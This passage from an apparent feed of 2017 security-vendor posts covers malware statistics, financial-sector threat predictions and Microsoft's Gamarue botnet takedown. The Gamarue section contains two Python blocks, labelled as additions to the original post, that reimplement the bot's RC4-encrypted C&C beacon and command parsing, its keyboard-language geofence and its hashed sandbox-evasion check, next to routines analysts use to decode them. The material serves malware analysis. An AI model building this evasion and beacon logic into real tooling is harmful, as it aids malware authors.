With banking Trojans, we observed the greatest activity from the Trickbot Trojan. We saw several variations in which the actors added new features to their code, for example, cryptocurrency stealing, embedding the EternalBlue exploit, and employing different ways of delivering the malware, which primarily targets the financial sector.

Another banking Trojan family that appeared often during the quarter was Emotet. In several spamming campaigns users were asked to download a Microsoft Word document from several locations. From our analysis of the attached document, we found the payload was hidden in the macros that used PowerShell to install the Trojan.

These major campaigns and others caused a tsunami of spam email, distributing a tremendous number of samples that increased the malware storage demands of all of us in the security industry.

For more details and our usual statistics on malware, breach incidents, and web and network threats, read the McAfee Labs Threats Report, December 2017.

The post McAfee Labs Reports All-Time Highs for Malware in Latest Count appeared first on McAfee Blogs.

Kaspersky Security Bulletin. Overall statistics for 2017

All the statistics used in this report were obtained using Kaspersky Security Network (KSN), a distributed antivirus network that works with various anti-malware protection components. The data was collected from KSN users who agreed to provide it. Millions of Kaspersky Lab product users from 213 countries and territories worldwide participate in this global exchange of information about malicious activity.

The year in figures

  • 4% of user computers were subjected to at least one Malware-class web attack over the year.
  • Kaspersky Lab solutions repelled 1 188 728 338 attacks launched from online resources located all over the world.
  • 199 455 606 unique URLs were recognized as malicious by web antivirus components.
  • Kaspersky Lab’s web antivirus detected 15 714 700 unique malicious objects.
  • 939 722 computers of unique users were targeted by encryptors.
  • Kaspersky Lab solutions blocked attempts to launch malware capable of stealing money via online banking on 1 126 701 devices.


Cybercriminals vs financial institutions in 2018: what to expect

Introduction – key events in 2017

2017 was a year of great changes in the world of cyberthreats facing financial organizations.

Firstly, in 2017 we witnessed a continuation of cyberattacks targeting systems running SWIFT — a fundamental part of the world’s financial ecosystem. Attackers were able to use malware in financial institutions to manipulate applications responsible for cross-border transactions, making it possible to withdraw money from any financial organization in the world, because SWIFT software is unified and used by almost all the major players in the financial market. Victims of these attacks included several banks in more than 10 countries around the world.

Secondly, in 2017 we saw the range of financial organizations that cybercriminals have been trying to penetrate expand significantly. Different cybercriminal groups penetrated bank infrastructure, e-money systems, cryptocurrency exchanges, capital management funds, and even casinos. Their main goal was to withdraw very large sums of money.

To complete their cybercriminal activities, attackers rely on proven schemes for monetizing network access. In addition to their attacks on SWIFT systems, cybercriminals have been actively using ATM infections, including those on financial institutions’ own networks, as well as abusing RB (remote banking) systems and PoS terminal networks, and making changes in banks’ databases to ‘play’ with card balances.

Attacks on ATMs are worth mentioning separately. This kind of robbery became so popular that 2017 saw the first ATM malware-as-a-service: with cybercriminals providing on underground forums all necessary malicious programs and video instructions to gain access to ATMs. Those who bought a subscription only needed to choose an ATM, open it following the instructions, and pay the service organizers for activating the malicious program on the ATM, after which the money withdrawal process started. Schemes like this significantly increased the number of cybercriminals, even making cybercrime accessible to non-professionals.

We saw the interception of bank customers’ electronic operations through the hijacking of bank domains. Customers thus had access not to their bank’s real infrastructure, but to a fake one created by intruders. For several hours, criminals were therefore able to perform phishing attacks, install malicious code and hijack the operations of customers who were using online banking services at the time.

It’s worth noting that, in some countries, banks have forgotten about the most “unimportant” thing – physical security. This has made attacks on banks’ financial assets possible. In some cases, this was due to easy access to cable lines, to which small Raspberry Pi devices were then connected. For several months these devices passively collected information about bank networks and sent intercepted data over LTE connections to the servers of intruders.

Predictions for 2018

  • Attacks via the underlying blockchain technologies of financial systems

Almost all of the world’s large financial organizations are actively investing in systems based on blockchain technology. Any new technology has its advantages, but also a number of new risks. Financial systems based on blockchain do not exist autonomously, therefore vulnerabilities and errors in blockchain implementations can enable attackers to earn money and disrupt the work of a financial institution. For instance, in 2016-2017, a number of vulnerabilities and errors were discovered in smart contracts, on which a number of financial institutions’ services have been built.

  • More supply chain attacks in the financial sphere

Large financial organizations invest considerable resources in cybersecurity, thus the penetration of their infrastructure is not an easy task. However, a threat vector that is likely to be actively used by cybercriminals in the coming year is attacks on software vendors supplying financial organizations. Such vendors, for the most part, have a weak level of protection compared to the financial organizations themselves. Last year, we witnessed a number of attacks like this, including against NetSarang, CCleaner, and MeDoc. As we can see, attackers replaced or modified updates for very different types of software. In the next year, we can expect cybercriminals to perform attacks via software designed specifically for financial organizations, including software for ATMs and PoS terminals. A few months ago we registered the first attempts of this kind, when attackers embedded a malicious module into a firmware installation file, and placed it on the official website of one of the American ATM software vendors.

  • Mass media (in general, including Twitter accounts, Facebook pages, Telegram, etc.) hacks and manipulation for getting financial profit through stock/crypto exchange trade

2017 will be remembered as the year of ‘fake news’. Besides the manipulation of public opinion, this phrase can also mean a dishonest way of earning money. Stock exchange trading is mostly carried out by robots that act on source data to make certain transactions; manipulating that source data can therefore lead to enormous changes in the price of goods, financial instruments and cryptocurrencies. In fact, just one tweet from an influencer, or a wave of messages on a social network created with the help of fake accounts, can drive the markets. And this method will certainly be used by intruders. With this approach, it’s almost impossible to find out which of the beneficiaries is the customer of the attack.

  • ATM malware automation

The first malware for ATMs appeared in 2009, and since then these devices have received constant attention from cyber-fraudsters. There has been a continuous evolution of this type of attack. The past year saw the emergence of ATM malware-as-a-service, and the next step will be the full automation of such attacks – a mini-computer will be connected automatically to an ATM, leading to malware installation and jackpotting or card data collection. This will significantly shorten the time needed for intruders to commit their crime.

  • More attacks on crypto exchange platforms

For the past year, cryptocurrencies have attracted a huge number of investors, which in turn has led to a boom in new services for trading various coins and tokens. Traditional players in the financial market, with highly developed cybersecurity protection, haven’t rushed to enter this field.

This situation provides attackers with an ideal opportunity to target cryptocurrency exchanges. On the one hand, new companies haven’t managed to test their security systems properly. On the other hand, the entire cryptocurrency exchange business, technically speaking, is built on well-known principles and technologies. Thus, attackers both know these technologies and already have the necessary toolkit to penetrate the infrastructure of new sites and services working with cryptocurrencies.

  • Traditional card fraud will spike due to the huge data breaches of the previous year

Big personal data leaks – including the recent Equifax case, which resulted in more than 140 million U.S. residents’ data being leaked to cybercriminals, and the Uber case, when the data of another 57 million customers was leaked – have created a situation where traditional banking security can seriously fail, because it’s based on the analysis of data about current or potential customers.

For example, detailed knowledge of a victim’s personal data can allow attackers to pose as a banking customer, and extract their victim’s money or security information, while to the bank concerned, their request looks legitimate. Therefore, the coming year may be marked by a spike in quite traditional fraud schemes, with the big data that has been collected (but not properly protected) by organizations about their customers for years, set to help attackers in the successful realization of their fraud schemes.

  • More nation-state sponsored attacks against financial organizations

The infamous Lazarus group, which is likely to be North-Korean state-sponsored, has attacked a number of banks in different parts of the world in the last few years. These have included banks in countries in Latin America, Europe, Asia and Oceania. Their main purpose has been to withdraw large sums of money, amounting to hundreds of millions of dollars. In addition, the data released by the Shadow Brokers indicates that experienced state-sponsored APT-groups are targeting financial institutions in order to learn more about cash flows. It is very likely that, next year other APT groups from countries that have just joined the cyber-spy game will follow this approach – both to earn money and to obtain information about customers, the flow of funds and the internal procedures of financial organizations.

  • Fintechs’ inclusion and mobile-only users: a fall in the number of traditional PC-oriented internet-banking Trojans. Novice mobile banking users will be a new prime target for criminals

Digital banks will continue revolutionizing the financial sector on a global scale, especially in emerging markets. For example, in Brazil and Mexico, these banks are gaining more and more momentum and this, of course, has attracted cybercriminal attention. We are sure that the world of cybercrime will see increasing attacks against this type of bank and their customers. Their main feature is the complete absence of branches and traditional customer service. All communication between the bank and its customers actually occurs through a mobile application. This can have several consequences.

The first is a decrease in the number of Windows Trojans, aimed at stealing money through traditional internet banking. The second is that the growing number of digital financial institutions will lead to organic growth in the number of users that are easy targets for cybercriminals: people without any mobile banking experience, but with banking applications installed on their mobile devices. These people will be the main targets for both malware attacks, such as Svpeng, and schemes completely built on social engineering. Persuading a customer to transfer money through a mobile application is much easier than forcing them to go to a physical bank and make a transaction.

Conclusion

During the past few years, the number and quality of attacks aimed at financial sector organizations have grown continuously. These are attacks on the infrastructure of an organization and its employees, not its customers.

The financial institutions that have not already thought about cybersecurity will soon face the consequences of hacker attacks. And these consequences will be incompatible with the continuation of these businesses: they will lead to a complete halt in operations as well as extreme losses.

To prevent situations like this from happening, it is necessary to constantly adapt security systems to new emerging threats. This is impossible without analyzing data and information about the most important and relevant cyberattacks aimed at financial organizations.

An effective approach to combating attacks will be for banks not only to choose the right security solutions, but also to use specialized intelligence reports on attacks, as these contain information that must be implemented immediately into overall protection systems. For example, using YARA rules and IOCs (indicators of compromise) will become vital for financial organizations in the coming months.

Kaspersky Security Bulletin: Review of the Year 2017

Introduction

The end of the year is a good time to take stock of the main cyberthreat incidents that took place over the preceding 12 months or so, to reflect on the impact these events had on organizations and individuals, and to consider what they could mean for the overall evolution of the threat landscape.

Looking back over 2017, what stands out most is the growing number of blurred boundaries: between different types of threat and different types of threat actor. Examples of this trend include the headline-making ExPetr attack in June. At first sight, this seemed to be yet another ransomware program, but it turned out to be a targeted, destructive data wiper. Another example is the dumping of code by the Shadow Brokers group, which placed advanced exploits allegedly developed by the NSA at the disposal of criminal groups that would otherwise not have had access to such sophisticated code. Yet another is the emergence of advanced persistent threat (APT) campaigns focused not on cyberespionage, but on theft, stealing money to finance other activities the APT group is involved in. It will be interesting to see how this trend evolves over 2018.

Highlights of 2017

  • The defining cyber-moments of 2017 were, without doubt, the WannaCry, ExPetr and BadRabbit ransomware attacks. The infamous Lazarus threat actor is believed to have been behind WannaCry, which spread at staggering speed and is now believed to have claimed around 700,000 victims worldwide. ExPetr was more targeted, hitting businesses including many well-known global brands through infected business software. Maersk, the world’s largest container ship and supply vessel company, has declared anticipated losses of between $200 mln. and $300 mln. as a result of ‘significant business interruption’ caused by the attack; while FedEx/TNT has announced around $300 mln. in lost earnings.
  • Elsewhere, the world’s big cyberespionage threat actors continued to do what they do, but with new, harder-to-detect tools and approaches. We reported on a wide range of campaigns, including the historically significant Moonlight Maze, believed to be related to Turla, as well as another Turla-related APT we call WhiteBear. We also uncovered the most recent toolkit of the Lamberts, an advanced threat actor that can be compared with Duqu, Equation, Regin or ProjectSauron in terms of complexity, and more technical details about the Spring Dragon group. In October, our advanced exploit prevention systems identified a new Adobe Flash zero-day exploit used in the wild against our customers, delivered through a Microsoft Office document. We can confidently link this attack to an actor we track as BlackOasis. For a more detailed summary of APT activity during 2017, you can view our annual APT review webinar here.
  • In 2017 we also observed a resurgence of targeted attacks designed to destroy data, either instead of, or as well as data theft, for example Shamoon 2.0 and StoneDrill. We also uncovered threat actors achieving success, sometimes for years, with simple and poorly executed campaigns. The EyePyramid attack in Italy was a good example of this. Microcin provided another instance of how cybercriminals can achieve their goals by using cheap tools and selecting their targets with care.
  • 2017 also revealed the extent to which advanced threat actors were diversifying into common theft to fund their expensive operations. We reported on BlueNoroff, a subset of the infamous Lazarus group that is responsible for generating illegal profits. BlueNoroff targeted financial institutions, casinos, companies developing financial trading software and those in the crypto-currency business, among others. One of the most notable BlueNoroff campaigns was its attacks on financial institutions in Poland.
  • Attacks on ATMs continued to rise in 2017, with attackers targeting bank infrastructure and payment systems using sophisticated fileless malware, as well as by the more rudimentary methods of taping over CCTVs and drilling holes. More recently, we discovered a new targeted attack on financial institutions – mainly banks in Russia, but also some in Malaysia and Armenia. The attackers behind this Silence Trojan used a similar approach to Carbanak.
  • Supply chain attacks appear to be the new ‘watering holes’ when it comes to targeting business victims. They emerged as a threat in 2017, seen in ExPetr and ShadowPad, and look set to increase further in 2018.
  • A year on from the Mirai botnet in 2016, the Hajime botnet was able to compromise 300,000 connected devices – and it was just one of many campaigns focused on connected devices and systems.
  • 2017 also saw a number of massive data breaches, with millions of records exposed overall – these include Avanti Markets, Election Systems & Software, Dow Jones, America’s Job Link Alliance and Equifax. The Uber data breach, which took place in October 2016 and exposed the data of 57 million customers and drivers, was only made public in November 2017.
  • The mobile malware landscape also evolved in 2017, and Trojanized mobile apps were downloaded in their tens of thousands or more, resulting in victims being swamped with aggressive advertising, hit with ransomware or facing theft through SMS and WAP billing. Mobile malware added new tricks to avoid detection, bypass security and exploit new services. As in 2016, many such apps were readily available through reputable sources such as the Google Play Store. Trojans particularly prevalent in 2017 included the Ztorg Trojan, Svpeng, Dvmap, Asacub and Faketoken.

Conclusion

2017 was a year when many things turned out to be very different from what they initially seemed to be. Ransomware was a wiper; legitimate business software was a weapon; advanced threat actors made use of simple tools while attackers farther down the food chain got their hands on highly sophisticated ones. These shifting sands of the cyberthreat landscape represent a growing challenge for security defenders.

For more information on these trends and advice on staying safe, please see the full Review of the Year 2017.

Download the Kaspersky Security Bulletin: Review of the Year 2017

Microsoft teams up with law enforcement and other partners to disrupt Gamarue (Andromeda)

Today, with help from Microsoft security researchers, law enforcement agencies around the globe, in cooperation with Microsoft Digital Crimes Unit (DCU), announced the disruption of Gamarue, a widely distributed malware that has been used in networks of infected computers collectively called the Andromeda botnet.

The disruption is the culmination of a journey that started in December 2015, when the Microsoft Windows Defender research team and DCU activated a Coordinated Malware Eradication (CME) campaign for Gamarue. In partnership with internet security firm ESET, we performed in-depth research into the Gamarue malware and its infrastructure.

Our analysis of more than 44,000 malware samples uncovered Gamarue’s sprawling infrastructure. We provided detailed information about that infrastructure to law enforcement agencies around the world, including:

  • 1,214 domains and IP addresses of the botnet’s command and control servers
  • 464 distinct botnets
  • More than 80 associated malware families

The coordinated global operation resulted in the takedown of the botnet’s servers, disrupting one of the largest malware operations in the world. Since 2011, Gamarue has been distributing a plethora of other threats.

A global malware operation

For the past six years, Gamarue has been a very active malware operation that, until the takedown, showed no signs of slowing down. Windows Defender telemetry in the last six months shows Gamarue’s global prevalence.

Figure 1. Gamarue’s global prevalence from May to November 2017

While the threat is global, the list of top 10 countries with Gamarue encounters is dominated by Asian countries.

Figure 2. Top 10 countries with the most Gamarue encounters from May to November 2017

In the last six months, Gamarue was detected or blocked on approximately 1,095,457 machines every month on average.

Figure 3. Machines, IPs, and unique file encounters for Gamarue from May to November 2017; data does not include LNK detections

The Gamarue bot

Gamarue is known in the underground cybercrime market as Andromeda bot. A bot is a program that allows an attacker to take control of an infected machine. Like many other bots, Gamarue is advertised as a crime kit that hackers can purchase.

The Gamarue crime kit includes the following components:

  • Bot-builder, which builds the malware binary that infects computers
  • Command-and-control application, which is a PHP-based dashboard application that allows hackers to manage and control the bots
  • Documentation on how to create a Gamarue botnet

A botnet is a network of infected machines that communicate with command-and-control (C&C) servers, which are computer servers used by the hacker to control infected machines.

The evolution of the Gamarue bot has been the subject of many thorough analyses by security researchers. At the time of takedown, there were five known active Gamarue versions: 2.06, 2.07, 2.08, 2.09, and 2.10. The latest and the most active is version 2.10.

Gamarue is modular, which means that its functionality can be extended by plugins that are either included in the crime kit or available for separate purchase. The Gamarue plugins include:

  • Keylogger ($150) – Used for logging keystrokes and mouse activity in order to steal user names and passwords, financial information, etc.
  • Rootkit (included in crime kit) – Injects rootkit code into all processes running on a victim computer to give Gamarue persistence
  • Socks4/5 (included in crime kit) – Turns the victim computer into a proxy server for serving malware or malicious instructions to other computers on the internet
  • Formgrabber ($250) – Captures any data submitted through web browsers (Chrome, Firefox, and Internet Explorer)
  • Teamviewer ($250) – Enables the attacker to remotely control the victim machine, spy on the desktop, perform file transfers, among other functions
  • Spreader – Adds the capability to spread the Gamarue malware itself via removable drives (for example, portable hard drives or flash drives connected via a USB port); it also uses a domain generation algorithm (DGA) for the servers from which it downloads updates

Gamarue attack kill-chain

Over the years, various attack vectors have been used to distribute Gamarue. These include:

  • Removable drives
  • Social media (such as Facebook) messages with malicious links to websites that host Gamarue
  • Drive-by downloads/exploit kits
  • Spam emails with malicious links
  • Trojan downloaders

Once Gamarue has infected a machine, it contacts the C&C server, making the machine part of the botnet. Through the C&C server, the hacker can control Gamarue-infected machines, steal information, or issue commands to download additional malware modules.

Figure 4. Gamarue’s attack kill-chain

Gamarue’s main goal is to distribute other prevalent malware families. During the CME campaign, we saw at least 80 different malware families distributed by Gamarue.

The installation of other malware broadens the scale of what hackers can do with the network of infected machines.

Command-and-control communication

When the Gamarue malware triggers the infected machine to contact the C&C server, it provides information such as the hard disk’s volume serial number (used as the bot ID for the computer), the Gamarue build ID, the operating system of the infected machine, the local IP address, an indication of whether the signed-in user has administrative rights, and the keyboard language setting of the infected machine. This information is sent to the C&C server via HTTP using the JSON format:

Figure 5. Information sent by Gamarue to C&C server

The information about the keyboard language setting is very interesting, because the machine will not be further infected if the keyboard language corresponds to one of the following countries:

  • Belarus
  • Russia
  • Ukraine
  • Kazakhstan

Before being sent to the C&C server, this information is encrypted with the RC4 algorithm using a key hardcoded in the Gamarue malware body.

Figure 6. Encrypted C&C communication

Once the C&C server receives the message, it sends a command that is pre-assigned by the hacker in the control dashboard.

Figure 7. Sample control dashboard used by attackers to communicate to Gamarue bots

The command can be any of the following:

  • Download EXE (i.e., additional executable malware files)
  • Download DLL (i.e., additional malware; removed in version 2.09 and later)
  • Install plugin
  • Update bot (i.e., update the bot malware)
  • Delete DLLs (removed in version 2.09 and later)
  • Delete plugins
  • Kill bot

The last three commands can be used to remove evidence of Gamarue presence in machines.

The reply from the C&C server is also encrypted with the RC4 algorithm, using the same key that encrypts the message from the infected machine.

Figure 8. Encrypted reply from C&C server

When decrypted, the reply contains the following information:

  • Time interval in minutes – how long to wait before asking the C&C server for the next command
  • Task ID – used by the hacker to track whether there was an error performing the task
  • Command – one of the commands mentioned above
  • Download URL – from which a plugin, updated binary, or other malware can be downloaded, depending on the command

Figure 9. Decrypted reply from C&C server
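The exchange described above, as an added example that is not part of the original post or of Microsoft's analysis: a plain-Python RC4 alongside both directions of the beacon/reply traffic, plus the analyst's side of the same key. The key value, the JSON field names, the pipe-delimited reply layout and the numeric command codes are assumptions; the field set, the excluded keyboard languages and the command names are the ones the post lists. Because RC4 is symmetric and the key is hardcoded, a key lifted from one sample decrypts captured traffic in both directions, which is what `decode_session` shows.

```python
import json
from typing import Any, Dict, List

# Stand-in for the key hardcoded in the bot body: an assumption for this example,
# not a key recovered from any real Gamarue sample.
RC4_KEY = b"example-hardcoded-bot-key"

# Keyboard languages the bot refuses to infect (Belarus, Russia, Ukraine, Kazakhstan).
# The two-letter codes are an assumption; the post names the countries, not the codes.
EXCLUDED_KEYBOARD_LANGS = {"be", "ru", "uk", "kk"}

# Command codes are an assumption; the command names are the ones the post lists.
COMMANDS = {1: "download_exe", 2: "download_dll", 3: "install_plugin",
            4: "update_bot", 5: "delete_dlls", 6: "delete_plugins", 7: "kill_bot"}


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (key scheduling, then keystream generation). Encrypting and
    decrypting are the same operation, so one hardcoded key covers both directions."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def should_infect(keyboard_lang: str) -> bool:
    """The geofence the post describes: bail out on the excluded keyboard layouts."""
    return keyboard_lang.lower() not in EXCLUDED_KEYBOARD_LANGS


def build_beacon(volume_serial: int, build_id: str, os_version: str,
                 local_ip: str, is_admin: bool, keyboard_lang: str) -> bytes:
    """Bot side: serialise the check-in fields as JSON and RC4 the result.
    Field names are assumptions; the field set is the one the post describes."""
    fields = {
        "id": f"{volume_serial:08X}",   # volume serial number doubles as the bot ID
        "bid": build_id,
        "os": os_version,
        "la": local_ip,
        "rg": 1 if is_admin else 0,
        "kl": keyboard_lang,
    }
    return rc4(RC4_KEY, json.dumps(fields, separators=(",", ":")).encode())


def decrypt_beacon(blob: bytes) -> Dict[str, Any]:
    """Analyst side: with the key pulled from the sample, recover the check-in."""
    return json.loads(rc4(RC4_KEY, blob).decode())


def build_reply(interval_min: int, task_id: int, command: int, url: str) -> bytes:
    """Server side. The pipe-delimited layout is an assumption; the four fields
    (interval, task ID, command, download URL) are the ones the post lists."""
    return rc4(RC4_KEY, f"{interval_min}|{task_id}|{command}|{url}".encode())


def parse_reply(blob: bytes) -> Dict[str, Any]:
    """Decrypt a C&C reply with the same key as the beacon and name the command."""
    interval, task_id, command, url = rc4(RC4_KEY, blob).decode().split("|", 3)
    code = int(command)
    return {"interval_min": int(interval), "task_id": int(task_id),
            "command": COMMANDS.get(code, f"unknown({code})"), "url": url}


def decode_session(blobs: List[bytes]) -> List[Dict[str, Any]]:
    """Walk a captured request/response sequence (beacon, reply, beacon, ...)
    and decode every message; the triage step for a PCAP from an infected host."""
    return [decrypt_beacon(b) if n % 2 == 0 else parse_reply(b)
            for n, b in enumerate(blobs)]


if __name__ == "__main__":
    # Constructed session: one check-in from a non-admin, English-keyboard host,
    # answered with an "install plugin" task.
    beacon = build_beacon(0x1A2B3C4D, "example-build", "6.1", "10.0.0.23", False, "en")
    reply = build_reply(15, 42, 3, "http://example.invalid/plugin.bin")
    for msg in decode_session([beacon, reply]):
        print(msg)
```

The practical point for responders is the last function: once the key is extracted from a sample, an HTTP capture of the bot's traffic can be replayed through `decode_session` to list every task the operator pushed, including the "delete" and "kill bot" commands the post notes are used to remove evidence.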

Anti-sandbox techniques

Gamarue employs anti-analysis techniques to make analysis and detection difficult. Prior to infecting a machine, Gamarue compares the hashes of the processes running on a potential victim’s machine against a built-in list. If it finds a process that may be associated with malware analysis tools, such as virtual machines or sandbox tools, Gamarue does not infect the machine. Older versions instead run a fake payload when a virtual machine is detected.

Figure 10. Gamarue checks if any of the running processes are associated with malware analysis tools
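Both sides of the hashed process-name check, as an added example that is not code from the post or from the malware: the bot-side comparison and the analyst's recovery of the list. The post says the bot compares hashes of process names but does not name the algorithm, so CRC32 over the lower-cased name is an assumption here, and the tool names are a constructed list, not Gamarue's real one. The point of hashing is that the tool names never appear as strings in the sample; `recover_blocklist` shows why that only buys a little, since a small wordlist of known analysis tools resolves most of the hashes.

```python
import zlib
from typing import Dict, Iterable, Optional, Set

# Constructed list of analysis-tool process names (VM guest services, sandbox
# service, debuggers and monitors). The real blocklist is not given in the post.
ANALYSIS_TOOLS = [
    "vboxservice.exe", "vboxtray.exe", "vmtoolsd.exe", "vmwaretray.exe",
    "sbiesvc.exe", "procmon.exe", "procexp.exe", "wireshark.exe",
    "ollydbg.exe", "x64dbg.exe", "idaq.exe",
]


def name_hash(process_name: str) -> int:
    """Stand-in for the bot's name hash: CRC32 over the lower-cased name.
    The algorithm is an assumption; only the hash-compare behaviour is from the post."""
    return zlib.crc32(process_name.lower().encode("utf-8")) & 0xFFFFFFFF


# What a sample actually ships: the hashes only, so no tool names show up in strings.
BLOCKLIST_HASHES: Set[int] = {name_hash(n) for n in ANALYSIS_TOOLS}


def analysis_tool_present(running: Iterable[str],
                          blocklist: Set[int] = BLOCKLIST_HASHES) -> bool:
    """Bot side: hash every running process name and refuse to infect if any
    hash is on the list. Case is normalised, so 'VBoxService.exe' still matches."""
    return any(name_hash(p) in blocklist for p in running)


def recover_blocklist(hashes: Iterable[int],
                      wordlist: Iterable[str]) -> Dict[int, Optional[str]]:
    """Analyst side: brute-force hashes extracted from the sample against a
    dictionary of candidate names. Hashes with no dictionary hit map to None."""
    lookup = {name_hash(w): w.lower() for w in wordlist}
    return {h: lookup.get(h) for h in hashes}


if __name__ == "__main__":
    # Constructed process lists: a clean host and a VirtualBox guest.
    clean = ["System", "smss.exe", "csrss.exe", "explorer.exe", "svchost.exe"]
    vbox = clean + ["VBoxService.exe", "VBoxTray.exe"]
    print("clean host would be infected:", not analysis_tool_present(clean))
    print("vbox guest would be infected:", not analysis_tool_present(vbox))
    # With only the hash table from the sample, a modest wordlist names most entries.
    unknown = name_hash("some-private-tool.exe")
    for h, name in recover_blocklist(BLOCKLIST_HASHES | {unknown}, ANALYSIS_TOOLS).items():
        print(f"{h:08x} -> {name}")
```

The same recovery routine is the usual answer to any string-hash blocklist in a sample: dump the constants, run them against a wordlist of tool binaries, and the unresolved remainder tells you which names the author was hiding that you have not yet guessed.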

Stealth mechanisms

Gamarue uses cross-process injection techniques to stay under the radar. It injects its code into the following legitimate processes:

  • msiexec.exe (Gamarue versions 2.07 to 2.10)
  • wuauclt.exe, wupgrade.exe, svchost.exe (version 2.06)

It can also use a rootkit plugin to hide the Gamarue file and its autostart registry entry.

Gamarue employs a stealthy technique to store and load its plugins as well. The plugins are stored fileless, either saved in the registry or in an alternate data stream of the Gamarue file.

OS tampering

Gamarue attempts to tamper with the operating system of infected computers by disabling the Firewall, Windows Update, and User Account Control functions. These functions cannot be re-enabled until the Gamarue infection has been removed from the infected machine. This OS tampering behavior does not work on Windows 10.

Figure 11. Disabled Firewall and Windows Update

Monetization

There are several ways hackers earn money using Gamarue. Since Gamarue’s main purpose is to distribute other malware, hackers earn through pay-per-install schemes. Using its plugins, Gamarue can also steal user information; stolen information can be sold to other hackers in cybercriminal underground markets. Access to Gamarue-infected machines can also be sold, rented, leased, or swapped by one criminal group to another.

Remediation

To help prevent a Gamarue infection, as well as other malware and unwanted software, take these precautions:

  • Be cautious when opening emails or social media messages from unknown users.
  • Be wary about downloading software from websites other than the program developers.

More importantly, ensure you have the right security solutions that can protect your machine from Gamarue and other threats. Windows Defender Antivirus detects and removes the Gamarue malware. With advanced machine learning models, as well as generic and heuristic techniques, Windows Defender AV detects new as well as never-before-seen malware in real-time via the cloud protection service. Alternatively, standalone tools, such as Microsoft Safety Scanner and the Malicious Software Removal Tool (MSRT), can also detect and remove Gamarue.

Microsoft Edge can block Gamarue infections from the web, such as those from malicious links in social media messages and drive-by downloads or exploit kits. Microsoft Edge is a secure browser that opens pages within low privilege app containers and uses reputation-based blocking of malicious downloads.

In enterprise environments, additional layers of protection are available. Windows Defender Advanced Threat Protection can help security operations personnel to detect Gamarue activities, including cross-process injection techniques, in the network so they can investigate and respond to attacks. Windows Defender ATP’s enhanced behavioral and machine learning detection libraries flag malicious behavior across the malware infection process, from delivery and installation, to persistence mechanisms, and command-and-control communication.

Microsoft Exchange Online Protection (EOP) can block Gamarue infections from email using built-in anti-spam filtering capabilities that help protect Office 365 customers. Office 365 Advanced Threat Protection helps secure mailboxes against email attacks by blocking emails with unsafe attachments, malicious links, and linked-to files, leveraging time-of-click protection.

Windows Defender Exploit Guard can block malicious documents (such as those that distribute Gamarue) and scripts. The Attack Surface Reduction (ASR) feature in Windows Defender Exploit Guard uses a set of built-in intelligence that can block malicious behaviors observed in malicious documents. ASR rules can also be turned on to block malicious attachments from being run or launched from Microsoft Outlook or webmail (such as Gmail, Hotmail, or Yahoo).

Microsoft is also continuing the collaborative effort to help clean Gamarue-infected computers by providing a one-time package with samples (through the Virus Information Alliance) to help organizations protect their customers.

Microsoft Digital Crimes Unit and Windows Defender Research team

‘McAfee Labs 2018 Threats Predictions Report’ Previews Five Cybersecurity Trends

This report was written by members of McAfee Labs and the Office of the CTO.

Welcome to the McAfee Labs 2018 Threats Predictions Report. We find ourselves in a highly volatile stage of cybersecurity, with new devices, new risks, and new threats appearing every day. In this edition, we have polled thought leaders from McAfee Labs and the Office of the CTO. They offer their views on a wide range of threats, including machine learning, ransomware, serverless apps, and privacy issues.

The Adversarial Machine Learning Arms Race Revs Up
The rapid growth and damaging effects of new cyberthreats demand defenses that can detect new threats at machine speeds, increasing the emphasis on machine learning as a valuable security component. Unfortunately, machines will work for anyone, fueling an arms race in machine-supported actions from defenders and attackers. Human-machine teaming has tremendous potential to swing the advantage back to the defenders, and our job during the next few years is to make that happen. To do that, we will have to protect machine detection and correction models from disruption, while continuing to advance our defensive capabilities faster than our adversaries can ramp up their attacks.

Ransomware Pivots to New Targets, New Objectives
The profitability of traditional ransomware campaigns will decline as vendor defenses, user education, and industry strategies improve to counter them. Attackers will target less traditional, more profitable ransomware targets, including high net-worth individuals, connected devices, and businesses. This pivot from the traditional will see ransomware technologies applied beyond the objective of extorting individuals, to cyber sabotage and disruption of organizations. The drive among adversaries for greater damage, disruption, and the threat of greater financial impact will not only spawn new variations of cybercrime “business models,” but also begin to seriously drive the expansion of the cyber insurance market.

Serverless Apps: New Opportunities for Friend and Foe
Serverless apps can save time and reduce costs, and enable greater granularity, such as finer-grained billing for services. But they can also increase the attack surface: they remain vulnerable in traditional ways, through privilege escalation and application dependencies, and in new ways, through data in transit across a network. Function development and deployment processes must include the necessary security steps, and traffic must be appropriately protected by VPNs or encryption.

When Your Home Becomes the Ultimate Storefront
As connected devices fill your house, companies will have powerful incentives to observe what you are doing in your home, and probably learn more than you want to share. In 2018, McAfee predicts more examples of corporations exploring new ways to capture that data. They will consider the fines of getting caught to be the cost of doing business, and change the terms and conditions on your product or service to cover their lapses and liabilities. It is more difficult to protect yourself from these issues, and the next year will see a significant increase in breaches and discoveries of corporate malfeasance.

Inside Your Child’s Digital Backpack
Perhaps the most vulnerable in this changing world are our children. Although they face an amazing future of gadgets, services, and experiences, they also face tremendous risks to their privacy. We need to teach them how to pack their digital backpacks so that they can make the most of this future. The world is becoming very public, and though many of us seem to be OK with that, the consequences of an ill-considered post or thoughtless online activity can be life altering for years to come.

The Adversarial Machine Learning Arms Race Revs Up

Attackers and defenders work to out-innovate each other in AI

Human-machine teaming is becoming an essential part of cybersecurity, augmenting human judgment and decision making with machine speed and pattern recognition. Machine learning is already making significant contributions to security, helping to detect and correct vulnerabilities, identify suspicious behavior, and contain zero-day attacks.

During the next year, we predict an arms race. Adversaries will increase their use of machine learning to create attacks, experiment with combinations of machine learning and artificial intelligence (AI), and expand their efforts to discover and disrupt the machine learning models used by defenders. At some point during the year, we expect that researchers will reverse engineer an attack and show that it was driven by some form of machine learning. We already see black-box attacks that search for vulnerabilities and do not follow any previous model, making them difficult to detect. Attackers will increase their use of these tools, combining them in novel ways with each other and with their attack methods. Machine learning could help improve their social engineering—making phishing attacks more difficult to recognize—by harvesting and synthesizing more data than a human can. Or increase the effectiveness of using weak or stolen credentials on the growing number of connected devices. Or help attackers scan for vulnerabilities, boosting the speed of attacks and shortening the time from discovery to exploitation.

